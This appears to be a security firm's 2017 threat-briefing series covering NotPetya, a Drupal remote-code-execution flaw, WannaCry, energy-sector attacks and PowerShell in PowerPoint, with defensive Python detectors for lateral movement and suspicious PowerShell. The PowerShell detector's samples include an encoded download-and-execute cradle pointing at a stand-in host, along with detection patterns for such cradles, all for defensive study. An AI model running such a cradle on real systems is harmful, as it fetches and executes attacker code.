DHS and the FBI released a TLP:AMBER report warning U.S. energy-sector and manufacturing companies about ongoing cyber operations.  These operations include sophisticated physical and cyber attacks, as well as activities targeting employees and operators with the aim of infiltrating air-gapped networks.

Impact
Our customers in the energy sector have seen scanning and attacks increase in the last month, but one interesting twist in the report is the targeting of individual employees in order to infiltrate secure networks.  Many details regarding the attacks are now known to the public, in part because an irresponsible organization shared a TLP:AMBER report with the press.  The approach of going after operators and employees to reach secure networks is reminiscent of how GCHQ compromised Belgacom’s network by targeting its engineers.
This warning comes almost one month after Robert Lee and his team at Dragos released their research on the CRASHOVERRIDE malware, alongside ESET’s analysis of the same malware under the name Industroyer.  Robert Lee will be presenting details on CRASHOVERRIDE at Black Hat in just a few weeks.

Recommendations
Your key operations and security staff should be trained in operational security (opsec).  Include physical security tests, and the targeting of specific roles and personnel, as part of your routine security assessments.

Additional Resources

News regarding recent hacking of nuclear plant:

CRASHOVERRIDE:
Historical piece on GCHQ targeting Belgacom employees:

07/03/2017 Wiperware disguised as ransomware strikes globally, taking advantage of unpatched systems and flat networks.

Issue
The recent wave of supposed ransomware attacks, known as NotPetya, spread rapidly through non-segmented (“flat”) networks after initial infection.  It is reported to have first hit Ukraine and subsequently spread internationally.  Many of the targets that reported infection are industrial, financial, health or other components of critical infrastructure.

Whereas the Petya ransomware that first emerged last year was genuine ransomware, the variant that wormed its way through flat networks in June 2017 (NotPetya) does not allow the data to be decrypted.  As such, InGuardians classifies it as wiperware.

NotPetya uses several different vectors for initial and subsequent infection.  It does use the leaked NSA exploits EternalBlue and EternalRomance, both addressed by Microsoft security update MS17-010, but it also leverages other vectors.  It includes a credential-harvesting component derived from Mimikatz’s LSADump functionality, used to recover passwords with the aim of gaining administrative access locally and eventually at the domain level.  NotPetya then uses PsExec and WMIC (Windows Management Instrumentation) calls with those credentials to infect further hosts.

Many people responsible for network security thought they were patched against the NSA exploits.  It is key to note that NotPetya has multiple initial infection vectors, including phishing, and that even if one of the NSA exploits is the vector of initial infection on a single unpatched machine, the credential-based vectors allow it to spread unhindered through flat networks full of otherwise patched systems.

Impact
Infections of NotPetya spread rapidly across non-segmented, or “flat,” networks, stealing credentials and leveraging privileges and trust.  The technical result is mangled data on infected systems that cannot be recovered.  The business impact has been a shutdown of operations at many of the affected targets.

Recommendations
The one common issue that allows the spread of NotPetya is networks that are not segmented with access control.  Networks that are only logically segmented, for example into VLANs with unrestricted routing between them, are still effectively flat because they lack access controls.  When access controls restrict traffic between network segments, hosts are well isolated; this stymies infections of this type and contains them to a single host or portion of the network.

InGuardians recommends implementing restrictive access controls at the network level and isolating hosts using host-based firewalls or Private VLANs.  InGuardians also recommends using Group Policy within Microsoft Active Directory to lock down endpoints and implement the Principle of Least Privilege, preventing lateral spread from affected internal systems.  These tactics are highly recommended to defend against modern malware attacks like NotPetya.
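Segmentation and least privilege limit how far a credential-driven worm can get; you also want to see the fan-out the moment it starts, because a source that authenticates to many hosts inside a few minutes looks nothing like an administrator’s working day.  The following is an added example, not InGuardians’ code: it runs over constructed Windows Security 4624 (network logon) and System 7045 (service installed) records, alerts on any source address that reaches a threshold of distinct hosts within a short window, and flags PsExec’s default service name.  The field names, the threshold and the window are assumptions; map them onto your own log pipeline.

```python
"""Spot NotPetya-style lateral movement in Windows event data.

Added example, not code from the original briefing. The event records are
constructed and carry only the fields the logic needs; the default
threshold (5 hosts) and window (5 minutes) are assumptions to tune per
environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. event_id 4624 = successful logon (Security log),
# logon_type 3 = network logon, which is what SMB, RPC and WMI access produce;
# event_id 7045 = new service installed (System log), which PsExec leaves behind.
SAMPLE_EVENTS = [
    # An administrator checking two servers several minutes apart: benign.
    {"time": "2017-06-27T10:02:00Z", "event_id": 4624, "logon_type": 3,
     "account": "CORP\\jdoe", "source_ip": "10.1.1.50", "host": "DC01"},
    {"time": "2017-06-27T10:09:00Z", "event_id": 4624, "logon_type": 3,
     "account": "CORP\\jdoe", "source_ip": "10.1.1.50", "host": "FS01"},
    # Console logon (logon_type 2) on a workstation: not lateral movement.
    {"time": "2017-06-27T10:10:00Z", "event_id": 4624, "logon_type": 2,
     "account": "CORP\\jdoe", "source_ip": "-", "host": "WS07"},
]
# An infected workstation (10.1.1.13) using a harvested service account against
# six hosts in under three minutes, then dropping PsExec's service on one of them.
for i, target in enumerate(["WS01", "WS02", "FS01", "FS02", "DC01", "PRN01"]):
    SAMPLE_EVENTS.append({
        "time": f"2017-06-27T10:{12 + i // 2}:{(i % 2) * 30:02d}Z", "event_id": 4624,
        "logon_type": 3, "account": "CORP\\svc_backup",
        "source_ip": "10.1.1.13", "host": target})
SAMPLE_EVENTS.append({"time": "2017-06-27T10:13:10Z", "event_id": 7045, "host": "FS02",
                      "service_name": "PSEXESVC",
                      "image_path": "%SystemRoot%\\PSEXESVC.exe"})


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def detect_fan_out(events, threshold=5, window_minutes=5):
    """One alert per source address whose network logons reach at least
    `threshold` distinct hosts inside any span of `window_minutes`."""
    window = timedelta(minutes=window_minutes)
    by_source = defaultdict(list)
    for e in events:
        if e["event_id"] == 4624 and e["logon_type"] == 3:
            by_source[e["source_ip"]].append((parse_time(e["time"]), e["host"], e["account"]))
    alerts = []
    for src, logons in by_source.items():
        logons.sort()  # chronological, so a window can start at any logon
        for i, (start, _, _) in enumerate(logons):
            in_window = [rec for rec in logons[i:] if rec[0] - start <= window]
            hosts = {h for _, h, _ in in_window}
            if len(hosts) >= threshold:
                alerts.append({"source_ip": src, "hosts": sorted(hosts),
                               "accounts": sorted({a for _, _, a in in_window}),
                               "first": start, "last": in_window[-1][0]})
                break  # one alert per source is enough to open an investigation
    return alerts


def detect_psexec_service(events):
    """Return System 7045 records that install PsExec's default service name."""
    return [e for e in events
            if e["event_id"] == 7045 and e.get("service_name", "").upper() == "PSEXESVC"]


if __name__ == "__main__":
    for a in detect_fan_out(SAMPLE_EVENTS):
        print(f"fan-out from {a['source_ip']} as {a['accounts']} to {len(a['hosts'])} hosts "
              f"({', '.join(a['hosts'])}) between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
    for e in detect_psexec_service(SAMPLE_EVENTS):
        print(f"PsExec service installed on {e['host']}: {e['image_path']}")
```

The service-name check is the weaker of the two: PsExec can be told to install its service under another name, and WMI-based spread installs no service at all, so treat the fan-out rule as the primary signal and the 7045 match as corroboration.  Vulnerability scanners and backup servers will trip the fan-out rule by design; allow-list them by source address rather than raising the threshold.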

Additional Resources
Setting up Private VLANs
http://packetlife.net/blog/2010/aug/30/basic-private-vlan-configuration/

http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3560/software/release/12-2_44_se/configuration/guide/scg/swpvlan.html

Implementing the Principle of Least Privilege within Various Versions of Windows

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models

https://technet.microsoft.com/en-us/library/bb456992.aspx

https://www.sans.org/reading-room/whitepapers/win2k/enforcing-least-privilege-principle-active-directory-ous-gpos-group-214

06/26/2017 Three Drupal updates patch critical vulnerabilities

Issue
One of the three critical vulnerabilities patched last week in the Drupal web content management system allows for remote code execution.

Impact
Drupal is one of the most popular content management systems in use, and the vulnerability described in CVE-2017-6920 gives an attacker the same capabilities on the system as Drupal itself (that is, code execution as the web server’s user).
The vulnerability is in how Drupal passes input to the PECL YAML extension’s parser, and is related to a bug found recently in PHP.  PHP updated its documentation to warn developers not to pass unsanitized user input to these functions, which did not “fix” the vulnerability.
Drupal updated its code, changing the way it passes input to the affected functions, and is no longer vulnerable to this attack vector.
YAML parsing vulnerabilities have led to quick, widespread exploitation in the past, in multiple web frameworks and languages, and are thus considered quite dangerous.

Recommendations
Recent high-profile website hacks and defacements emphasize the need to check your content management system implementation and ensure it is up to date.

  • Tactical recommendation: If your organization has deployed Drupal, update to Drupal 8.3.4 or Drupal 7.56, as both branches include the fixes for these vulnerabilities.
  • Strategic recommendation: Consider using a static publishing script to separate your editing/publishing platform from your delivery system. This allows your team to reap the benefits of a content management system, and couples it with the security of a static site. WordPress, Drupal and other popular systems have static publishing plugins or scripts.
Additional Resources
Drupal update:
CVE Entries for the three Drupal vulnerabilities:
Example static publishing plugins:

06/19/2017 Nation states in the ransomware business

Issue

Nation states are now confirmed to be using ransomware campaigns to fund state coffers.   The British National Cyber Security Centre (NCSC) reported this week that the WannaCry ransomware attack was launched from North Korea.  This follows the United States National Security Agency (NSA) assessment with the same conclusion.  Security experts believe that the attack was launched by the Lazarus Group, tied to the government in Pyongyang.
Impact
This revelation further emphasizes the need for full backup, recovery and continuity plans to be tested and refreshed.  While most of our customers have robust patching, backup and recovery processes in place, we see from news reports the impact WannaCry had on critical production networks.  Many organizations have lost their data, or access to critical systems, while locked out during a ransomware attack; for example, the British National Health Service’s systems were crippled during the WannaCry attack.
Recommendations

InGuardians recommends reviewing, testing and validating your patching and backup/recovery processes.  Incident response capabilities should be tested as well, guided by an internal Red Team exercise designed to emulate the ransomware threat model.  InGuardians does not recommend paying for the return of your data.  See the link below for new regulations that might affect the practice of paying your way out of ransomware.

Additional Resources

Articles related to this issue:

NIST Incident Response:

Bitcoin regulations to prevent infosec companies from helping organizations pay ransom:

06/12/2017 PowerShell scripts execute in PowerPoint without macros

Issue

Microsoft’s powerful native scripting language, PowerShell, is able to execute from inside a PowerPoint presentation without using macros.  This presents an issue for the many organizations that rely on blocking macros, or documents containing macros, to minimize the risk of compromise via Microsoft Office documents.

Impact

InGuardians Red Team operators used this very technique to compromise one of our toughest clients just last week.  This is a very real threat posing risk to the information security of your organization.  Determine which controls and audit measures best fit your security posture and move swiftly to lock down this threat vector.

Recommendations

InGuardians recommends first determining whether systems need PowerShell at all.  If it is needed, ensure PowerShell is up to date: older versions lack many of the security features that version 5 has, such as script block logging and AMSI integration, and an attacker who can launch the old version 2 engine gets around them.  Take the necessary steps (outlined here: https://adsecurity.org/?p=2604) to detect PowerShell being used offensively on your systems.
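The detection side of that recommendation, as an added example that is not code from the briefing or from the linked adsecurity.org posts: a triage routine that scores PowerShell command lines (as recorded by process-creation auditing, Security event 4688) for the switches attackers lean on, decodes an -EncodedCommand payload so the cradle inside it can be inspected, and flags an explicit downgrade to the version 2 engine.  The command lines are constructed, and the indicator list and weights are assumptions you would extend from your own telemetry.

```python
"""Triage PowerShell command lines for signs of offensive use.

Added example, not code from the original briefing or from adsecurity.org.
The command lines are constructed; the indicator list is a starting point,
not a complete catalogue, and the weights are arbitrary.
"""
import base64
import re

# (label, pattern, weight). Patterns are matched case-insensitively against the
# raw command line plus, where present, the decoded -EncodedCommand payload.
INDICATORS = [
    ("encoded-command", r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", 3),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("no-profile", r"-nop(?:rofile)?\b", 1),
    ("bypass-policy", r"-(?:ep|ex|exec|executionpolicy)\s+bypass", 1),
    ("version-downgrade", r"-v(?:ersion)?\s+2(?:\.0)?\b", 3),
    ("download-cradle", r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3),
    ("invoke-expression", r"\biex\b|invoke-expression", 2),
    ("inline-base64", r"frombase64string", 2),
]

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Return (score, reasons, decoded_payload) for one command line."""
    payload = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + payload if payload else "")
    score, reasons = 0, []
    for label, pattern, weight in INDICATORS:
        if re.search(pattern, haystack, re.I):
            reasons.append(label)
            score += weight
    return score, reasons, payload


def triage(cmdlines, alert_at=5):
    """Return the command lines scoring at or above `alert_at`, highest first."""
    rows = []
    for c in cmdlines:
        score, reasons, payload = score_command(c)
        if score >= alert_at:
            rows.append({"cmdline": c, "score": score, "reasons": reasons, "payload": payload})
    return sorted(rows, key=lambda r: r["score"], reverse=True)


def _encode(ps):
    """Build an -EncodedCommand argument the way PowerShell expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed samples: one routine job, one document-launched stager, one downgrade.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"
SAMPLE_COMMANDS = [
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
    "powershell.exe -w hidden -nop -ep bypass -enc " + _encode(CRADLE),
    "powershell.exe -Version 2 -NonInteractive -c \"iex ([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('R2V0LVByb2Nlc3M=')))\"",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_COMMANDS):
        print(f"[{row['score']:>2}] {', '.join(row['reasons'])}")
        print(f"     {row['cmdline'][:90]}")
        if row["payload"]:
            print(f"     decoded: {row['payload']}")
```

Run this over 4688 command lines (or Sysmon event 1) and the alert threshold quickly separates scheduled jobs from stagers; the routine backup job above scores 1 for its -NoProfile switch and never surfaces.  The decode step matters because the switches on a stager are generic while the payload is where the download cradle lives.  Script block logging (event 4104) gives you the same payload after every layer of obfuscation has been unwrapped, which is why the version 5 upgrade is the control that makes this kind of triage reliable.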

Additional Resources

Excellent technical write-up on PowerShell security: https://adsecurity.org/?p=2921

Recent article on this threat: https://thehackernews.com/2017/06/microsoft-powerpoint-malware.html